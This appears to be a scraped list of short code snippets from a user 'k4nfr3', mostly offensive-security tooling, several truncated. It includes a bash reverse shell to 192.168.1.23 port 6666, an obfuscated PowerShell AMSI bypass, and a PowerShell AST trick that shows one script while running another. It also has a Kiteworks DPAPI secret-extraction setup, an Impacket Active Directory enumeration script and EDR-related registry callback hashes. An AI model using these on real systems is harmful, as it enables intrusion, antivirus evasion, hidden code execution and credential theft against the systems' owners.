k4nfr3

netsh

rpc filter

add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=12345678–1234-ABCD-EF00–0123456789AB
add filter

add rule layer=um actiontype=block
add condition field=if_uuid matchtype=equal data=c681d488-d850–11d0–8c52–00c04fd90f7e

k4nfr3

bash -i >& /dev/tcp/192.168.1.23/6666 0>&1

k4nfr3

$SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast  
$ExecutedAst = [ScriptBlock]::Create("Write-Output 'My Hidden Hello Hidden'").Ast
$Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,$null,$null,$null,$ExecutedAst.EndBlock.Copy(),$null)
$Sb = $Ast.GetScriptBlock() 
$Sb&

k4nfr3

Add NugetComponent Microsoft.Win32.Registry
Add NugetComponent System.Security.Cryptography.ProtectedData

Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/
Tested on lates version Kiteworks 8.3.0

=========================================
/* Created by Sergei Gundorov 1/2/2020
 * Intent: provide sample project for encrypting secrets with DPAPI while working with 
 * Power BI Embedded and API tutorials and samples. 

k4nfr3

import requests
import json

# Proxy settings fo debug (with burp or other)
proxy_enable = False
proxy = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

k4nfr3

#!/usr/bin/env python
# modifications of original script GetAdusers.py from Impacket.
# this version returns the list of last seen 24h machines
#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11
#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
#
#Password:
#[*] Querying 192.168.16.11 for information about domain.
#Name                  PasswordLastSet             LastLogon                   OperatingSystemVersion  OperatingSystem                          IP Address
#--------------------  --------------------------  --------------------------  ----------------------  ---------------------------------------  ------------

k4nfr3

#!/usr/bin/env python

from __future__ import print_function

import json
import re
import socket
import ssl
import subprocess
import sys

k4nfr3

'ntdll.dll' '4097367' '0x3e8557'
'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662'
'RegNtPostCreateKey' '76320549262' '0x11c50f298e'
'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745'
'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb'
'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16'
'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8'
'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd'
'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8'
'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2'

k4nfr3

Scrapped from official web site: https://downloads.rclone.org/v.../SHA1SUMS
===========================================================================
Windows Clients

ecce335a75b0f8678ba0494b178f3b41309b72be  rclone-current-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134  rclone-current-windows-amd64.zip
ecce335a75b0f8678ba0494b178f3b41309b72be  rclone-v1.40-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134  rclone-v1.40-windows-amd64.zip
18d6a87012de120c66b5abaa97f5932fe56beee7  rclone-v1.41-windows-386.zip
6f4bee89380b70742ba7d37c80da0f0b4f890612  rclone-v1.41-windows-amd64.zip

k4nfr3

Write-Host '[+] Loading AMSI Bypass...'
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Write-Host '[+] done' -ForegroundColor green